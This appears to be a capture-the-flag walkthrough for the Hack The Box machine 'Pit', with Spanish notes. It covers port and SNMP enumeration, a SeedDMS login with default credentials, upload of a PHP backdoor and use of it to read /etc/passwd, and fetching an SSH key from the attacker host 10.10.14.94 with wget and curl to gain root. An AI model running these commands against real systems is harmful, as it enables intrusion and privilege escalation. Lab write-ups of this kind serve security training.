echo "10.129.51.6 dms-pit.htb pit.htb" | sudo tee -a /etc/hosts

nmap -A -p- -oA pit 10.129.51.6 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA pit 10.129.51.6

nmap -sU -O -p- -oA pit-udp 10.129.51.6

nikto -h 10.129.51.6:80

gobuster dir -k -u http://10.129.51.6/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

nmap -p- --open -T5 -v -n 172.31.1.8

nmap -p- --open -T5 -v -n 172.31.1.8 --max-retries 0 -oG allPorts

extractPorts allPorts

nmap -sCV -p21,53,80,135,389 172.31.1.8 -oN targeted --version-intensity 0

https://10.129.51.6

Vemos el dominio de pit.htb y lo metemos en etc/hosts

Hacemos un git clone de este repositorio

https://github.com/dheiland-r7/snmp

./snmpbw.pl 10.129.51.6 public 2 1

nmap -sVU -p 10.129.51.6 -oN snmScan

cat 10.129.51.6 | grep -i "var/www/html"

michelle:michelle Nos vamos a http://dms.pit.htb y metemos las credenciales

https://www.exploit-db.com/exploits/47022

Vemos un formulario para subir archivos.

Subimos un archivo con backdoor por ejemplo simple-backdoor.php

Vemos el document id para tener una referencia.

Vamos a http://dms-pit.htb/seeddms51x/data/1048576/30/1.php?cmd=cat+/etc/passwd

Podemos ver las credenciales de una base de datos

Nos regresamos a ver en Cuentas los privilegios que tenemos como el usuario michelle

Vamos al terminal y vemos que podemos ver user.txt

Creamos una llave id_rsa

cat cu3rv0x.pub > key.sh

python3 -m http.server 8888

cd /usr/local/monitoring

wget http://10.10.14.94:8888/key.sh

curl http://10.10.14.94:8888/key.sh -o key.sh

snmpwalk -m +MY-MIB -v2c -c 10.129.51.6 nsExtendObjects

ssh -i cu3rv0x root@pit.htb